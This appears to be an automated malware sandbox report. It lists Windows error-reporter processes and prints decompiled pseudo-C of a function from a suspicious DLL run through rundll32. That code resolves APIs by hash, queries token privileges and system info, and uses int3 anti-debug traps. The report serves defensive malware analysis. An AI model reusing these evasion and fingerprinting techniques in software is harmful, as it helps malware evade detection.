MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 1312 Parent PID: 7100

General

Start time:	04:53:12
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 664
Imagebase:	0x80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 1768 Parent PID: 7112

General

Start time:	04:53:16
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 664
Imagebase:	0x80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5452 Parent PID: 7112

General

Start time:	04:53:21
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 664
Imagebase:	0x80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5588 Parent PID: 7088

General

Start time:	04:53:21
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664
Imagebase:	0x80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5440 Parent PID: 7100

General

Start time:	04:53:25
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 664
Imagebase:	0x80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 1536 Parent PID: 7124

General

Start time:	04:53:28
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 664
Imagebase:	0x80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5016 Parent PID: 7124

General

Start time:	04:53:29
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 664
Imagebase:	0x80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 6544 Parent PID: 6500 rundll32.exeCOMMON

Executed Functions

Function 6F030754, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6F030754(void* __ecx) {
				void* __esi;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6f03d1f8;
				if(_t155 == 0x255be0d1) {
					_t155 = E6F0335F4(0x30);
					 *0x6f03d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6F033670(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6F033044(0x10154545, 0x51a0195c, 0x10154545, 0x10154545) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6f03d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6F03101C(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6f03d1f8 + 0xb)) = _t162;
					_t363 = E6F033044(0x8b9d0da7, 0x8335dc52, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6f03d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6F030754(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6f03bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6F02F5A8(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6F02F84C(_t429 + 0x24, E6F02F4F0(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6F02F4E0(_t429 + 0x24, E6F02F4F0(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6F035558(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6F02F678(_t429 + 0x20);
							E6F035588(_t429 + 8, _t429 + 0x1c0, 0x5e9822cf);
							_t180 = E6F03583C(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6F02DFDC(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6F035588(_t429 + 8, _t429 + 0x1c8, 0x80c4a2b7);
								_t420 = E6F03583C(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6F02DFDC(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6F035588(_t429 + 8, _t429 + 0x1d0, 0xa89c042f);
								_t401 = E6F03583C(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6F02DFDC(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6F02D020(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6F035530(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6F02D020(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6F035530(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6F02D020(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6F035530(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6F02D020(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6F035530(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6F02D020(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6F035530(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6F02D020(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6F035530(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6f03d1f8 + 0x24)) = _t189;
							_t190 = E6F031054(0xffffffffffffffff);
							_t320 =  *0x6f03d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6f03d1f8 + 0x2c)) = E6F0310C8(0xffffffffffffffff);
								L78:
								if(E6F033044(0x10154545, 0xccc77b1, 0x10154545, 0x10154545) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6f03d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6F033044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6f03d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6F0335C8(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6F033044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6F0335C8(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6F02F5A8(_t429 + 0x18c, _t206);
								_t411 = E6F033044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6F02F678(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6F02F4E0(_t429 + 0x18c, 0);
								_t213 = E6F02F4F0(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6F0335C8(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6F02F4E0(_t429 + 0x18c, 0);
								E6F02DF84(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6F033044(0x8b9d0da7, 0x628b2cfa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6F02DFF8(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6F033044(0x10154545, 0x44fb2dcc, 0x10154545, 0x10154545);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6F02E0A4(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6F034FD4( *((intOrPtr*)(_t429 + 0x1b8)), E6F02E8D4( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6F02DFDC(_t429 + 0x1b8);
								E6F02DFDC(_t429 + 0x1b0);
								E6F02F678(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6F02BB88(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6f03d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6F02BB88(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6F0335C8(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6F033044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6F0335C8(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6F02F5A8(_t429 + 0x3c, _t262);
						_t265 = E6F033044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6F02F678(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6F02F4E0(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6F02F4F0(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6F0335C8(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6F02F4E0(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6F033044(0x8b9d0da7, 0xbdc0a291, 0x8b9d0da7, 0x8b9d0da7);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6F0335C8(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6F030FF8(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6F033044(0x8b9d0da7, 0x2ae47d4a, 0x8b9d0da7, 0x8b9d0da7);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6F030FF8(_t403, _t413, _t403);
								}
								E6F02F678(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6F02BB88(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6F02BB88(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6f030763
0x6f030765
0x6f03076c
0x6f030feb
0x6f030ff1
0x6f030ff1
0x6f030776
0x6f030782
0x6f03078e
0x6f030793
0x6f0307a0
0x6f0307b1
0x6f0307b3
0x6f0307b4
0x6f0307b5
0x6f0307b5
0x6f0307b6
0x6f0307ba
0x6f0307be
0x6f0307c3
0x6f0307c6
0x6f0307cc
0x6f0307e6
0x6f0307ed
0x6f0307f0
0x6f0307f3
0x6f0307f5
0x6f030801
0x6f03080e
0x6f03081b
0x6f03081f
0x6f0308ab
0x6f0308ab
0x6f0308ad
0x6f0308b1
0x6f0308bc
0x6f0308d2
0x6f0308d5
0x6f0308d5
0x6f0308d9
0x6f0308e2
0x6f0308e7
0x6f0308e7
0x6f0308e9
0x6f0308fa
0x6f03091c
0x6f03091e
0x6f03091f
0x6f030923
0x6f030923
0x6f03092c
0x6f030938
0x6f030941
0x6f030957
0x6f030967
0x6f03096c
0x6f030970
0x6f030975
0x6f030977
0x6f0309c7
0x6f0309dc
0x6f0309e0
0x6f0309e5
0x6f0309f6
0x6f030a0b
0x6f030a0f
0x6f030a14
0x6f030a16
0x6f030a5d
0x6f030a60
0x6f030aae
0x6f030ab1
0x6f030af2
0x6f030af6
0x6f030afb
0x6f030b00
0x6f030b1f
0x6f030b1f
0x6f030b1f
0x6f030b21
0x00000000
0x6f030b21
0x6f030b02
0x6f030b06
0x6f030b08
0x6f030b0f
0x6f030b0f
0x6f030b15
0x6f030b15
0x6f030b17
0x6f030b1a
0x6f030b1a
0x00000000
0x6f030b17
0x6f030b0a
0x6f030b0d
0x6f030b13
0x6f030b13
0x00000000
0x6f030b13
0x00000000
0x6f030b0d
0x6f030ab3
0x6f030ab6
0x00000000
0x00000000
0x6f030abc
0x6f030ac1
0x6f030ac6
0x6f030ae5
0x6f030ae5
0x6f030aef
0x00000000
0x6f030aef
0x6f030ac8
0x6f030acc
0x6f030ace
0x6f030ad5
0x6f030ad5
0x6f030adb
0x6f030adb
0x6f030add
0x6f030ae0
0x6f030ae0
0x00000000
0x6f030add
0x6f030ad0
0x6f030ad3
0x6f030ad9
0x6f030ad9
0x00000000
0x6f030ad9
0x00000000
0x6f030ad3
0x6f030a62
0x6f030a64
0x6f030aa3
0x6f030aa6
0x6f030e18
0x6f030e1d
0x6f030e22
0x6f030e41
0x6f030e41
0x6f030e4b
0x00000000
0x6f030e4b
0x6f030e24
0x6f030e28
0x6f030e2a
0x6f030e31
0x6f030e31
0x6f030e37
0x6f030e37
0x6f030e39
0x6f030e3c
0x6f030e3c
0x00000000
0x6f030e39
0x6f030e2c
0x6f030e2f
0x6f030e35
0x6f030e35
0x00000000
0x6f030e35
0x00000000
0x6f030e2f
0x00000000
0x6f030aac
0x6f030a6a
0x6f030a6f
0x6f030a74
0x6f030a93
0x6f030a93
0x6f030a9d
0x00000000
0x6f030a9d
0x6f030a76
0x6f030a7a
0x6f030a7c
0x6f030a83
0x6f030a83
0x6f030a89
0x6f030a89
0x6f030a8b
0x6f030a8e
0x6f030a8e
0x00000000
0x6f030a8b
0x6f030a7e
0x6f030a81
0x6f030a87
0x6f030a87
0x00000000
0x6f030a87
0x00000000
0x6f030a81
0x6f030a18
0x6f030a1a
0x00000000
0x00000000
0x6f030a24
0x6f030a29
0x6f030a2e
0x6f030a4d
0x6f030a4d
0x6f030a57
0x00000000
0x6f030a57
0x6f030a30
0x6f030a34
0x6f030a36
0x6f030a3d
0x6f030a3d
0x6f030a43
0x6f030a43
0x6f030a45
0x6f030a48
0x6f030a48
0x00000000
0x6f030a45
0x6f030a38
0x6f030a3b
0x6f030a41
0x6f030a41
0x00000000
0x6f030a41
0x00000000
0x6f030a3b
0x6f03097d
0x6f030982
0x6f030987
0x6f0309a6
0x6f0309a6
0x6f0309b0
0x00000000
0x6f0309b0
0x6f030989
0x6f03098d
0x6f03098f
0x6f030996
0x6f030996
0x6f03099c
0x6f03099c
0x6f03099e
0x6f0309a1
0x6f0309a1
0x00000000
0x6f03099e
0x6f030991
0x6f030994
0x6f03099a
0x6f03099a
0x00000000
0x6f03099a
0x00000000
0x6f0308be
0x6f0308c0
0x6f030b25
0x6f030b2a
0x6f030b2d
0x6f030b32
0x6f030b34
0x6f030b49
0x6f030b4c
0x6f030c1a
0x6f030c22
0x6f030c25
0x6f030c3a
0x6f030c44
0x6f030c44
0x6f030c46
0x6f030c48
0x6f030c57
0x6f030c63
0x6f030c67
0x6f030c6a
0x6f030c6d
0x6f030c70
0x00000000
0x6f030c70
0x6f030b5c
0x6f030b6e
0x6f030b72
0x6f030bfe
0x6f030bfe
0x6f030c04
0x6f030c0f
0x6f030c06
0x6f030c06
0x6f030c06
0x00000000
0x6f030c04
0x6f030b7f
0x6f030b80
0x6f030b82
0x6f030b88
0x6f030fd7
0x6f030fdc
0x6f030fde
0x00000000
0x00000000
0x6f030fe4
0x6f030b9f
0x6f030ba3
0x6f030ba8
0x6f030bba
0x6f030bbe
0x6f030bc9
0x6f030bca
0x6f030bcb
0x6f030bcc
0x6f030bce
0x6f030bd9
0x6f030e51
0x6f030e51
0x6f030bd9
0x6f030bdf
0x6f030be8
0x6f030e63
0x6f030e79
0x6f030e7b
0x6f030e7d
0x6f030fb8
0x6f030fbf
0x00000000
0x6f030fbf
0x6f030e8c
0x6f030e9a
0x6f030eb4
0x6f030eb6
0x6f030eb8
0x6f030fc9
0x6f030fce
0x6f030fd0
0x00000000
0x00000000
0x6f030fd2
0x6f030ecc
0x6f030ed7
0x6f030ee6
0x6f030ef8
0x6f030efa
0x6f030efc
0x6f030f09
0x6f030f09
0x6f030f19
0x6f030f2a
0x6f030f2f
0x6f030f31
0x6f030f33
0x6f030f3a
0x6f030f3b
0x6f030f3b
0x6f030f47
0x6f030f68
0x6f030f71
0x6f030f7d
0x6f030f89
0x6f030f8e
0x6f030f93
0x6f030f99
0x6f030f99
0x6f030f9e
0x6f030fa4
0x00000000
0x6f030faa
0x6f030fac
0x00000000
0x6f030fac
0x6f030bee
0x6f030bee
0x6f030bf3
0x6f030bf9
0x6f030bf9
0x00000000
0x6f030bf3
0x6f030be8
0x6f0308bc
0x6f03082c
0x6f03082d
0x6f03082f
0x6f030835
0x6f030e02
0x6f030e07
0x6f030e09
0x00000000
0x00000000
0x6f030e0f
0x6f03084c
0x6f030850
0x6f030855
0x6f03086b
0x6f030882
0x6f030886
0x6f030c7e
0x6f030c7e
0x6f030886
0x6f03088c
0x6f030895
0x6f030c8d
0x6f030c9e
0x6f030ca3
0x6f030ca5
0x6f030ca7
0x6f030dd8
0x6f030ddc
0x00000000
0x6f030ddc
0x6f030cb3
0x6f030cd8
0x6f030cda
0x6f030cdc
0x6f030df4
0x6f030df9
0x6f030dfb
0x00000000
0x00000000
0x6f030dfd
0x6f030ced
0x6f030cfb
0x6f030d02
0x6f030d03
0x6f030d04
0x6f030d16
0x6f030d18
0x6f030d1a
0x00000000
0x00000000
0x6f030d22
0x6f030d3d
0x6f030d3f
0x6f030d41
0x6f030de6
0x6f030deb
0x6f030ded
0x00000000
0x00000000
0x6f030def
0x6f030d47
0x6f030d4e
0x6f030d52
0x6f030dbd
0x6f030dbd
0x6f030dbf
0x6f030dc6
0x6f030dc6
0x6f030dcc
0x6f030dcc
0x6f030dce
0x6f030dd3
0x6f030dd3
0x00000000
0x6f030dce
0x6f030dc1
0x6f030dc4
0x6f030dca
0x6f030dca
0x00000000
0x6f030dca
0x00000000
0x6f030dc4
0x6f030d54
0x6f030d54
0x6f030d56
0x6f030d62
0x6f030d67
0x6f030d69
0x00000000
0x00000000
0x6f030d6b
0x6f030d6f
0x6f030d76
0x6f030d77
0x6f030d78
0x6f030d7a
0x00000000
0x00000000
0x6f030d7c
0x6f030d7e
0x6f030d85
0x6f030d85
0x6f030d8b
0x6f030d8b
0x6f030d8d
0x6f030d92
0x6f030d92
0x6f030d9b
0x6f030da0
0x6f030da5
0x6f030dab
0x6f030dab
0x6f030db0
0x00000000
0x6f030db0
0x6f030d80
0x6f030d83
0x6f030d89
0x6f030d89
0x00000000
0x6f030d89
0x00000000
0x6f030db7
0x6f030db7
0x6f030db8
0x6f030db8
0x00000000
0x6f030d56
0x6f03089b
0x6f0308a0
0x6f0308a6
0x6f0308a6
0x00000000
0x6f030c7d
0x6f030c7d
0x6f030c7d

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7), ref: 6F030882
GetSystemInfo.KERNELBASE(?,10154545,10154545,?,?,A89C042F,?,?,80C4A2B7,?,?,5E9822CF,00000000,80000002,00000000,-000000FC), ref: 6F030C44
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7,00000000,8B9D0DA7,8B9D0DA7), ref: 6F030CD8

Strings

J}*, xrefs: 6F030D5B

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID: J}*
API String ID: 298373132-3566034359
